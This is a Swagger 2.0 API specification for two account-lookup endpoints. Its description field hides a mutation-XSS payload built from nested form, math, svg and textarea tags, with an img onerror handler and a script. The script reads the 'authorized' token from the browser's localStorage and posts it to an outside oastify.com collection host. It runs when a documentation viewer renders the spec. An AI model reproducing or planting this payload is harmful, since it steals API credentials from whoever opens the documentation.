swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <form><math><mtext></form>
    <form>
      <mglyph>
        <svg>
          <mtext>
            <textarea><path id=&quot;&quot;&gt;&lt;/textarea&gt;
            <img src=&quot;1&quot; onerror=&quot;handleData()&quot;&gt;
            <script>
              function handleData() {
                var data = localStorage.getItem(&#x27;authorized&#x27;);
                if (data) {
                  // Prompt the user with the value
                  alert(data);
                  // Send the data to your server
                  var xhr = new XMLHttpRequest();
                  xhr.open(&#x27;POST&#x27;, &#x27;https://hg1ouijeff2z6whrf5fly5ij9af13rrg.oastify.com&#x27;, true);
                  xhr.setRequestHeader(&#x27;Content-Type&#x27;, &#x27;application/json&#x27;);
                  xhr.send(JSON.stringify({ authorized: data }));
                }
              }
              // Execute the function to ensure it runs
              handleData();
            </script>
          </path>
        </mtext>
      </svg>
    </mglyph>
    </form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
  /accounts/groupid/{id}:
    get:
      parameters:
        - name: id
          in: path
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccountById
      summary: Finds an account by ID
definitions:
  Account:
    type: object
    properties:
      id:
        type: integer
      name:
        type: string
securityDefinitions:
  basicAuth:
    type: basic
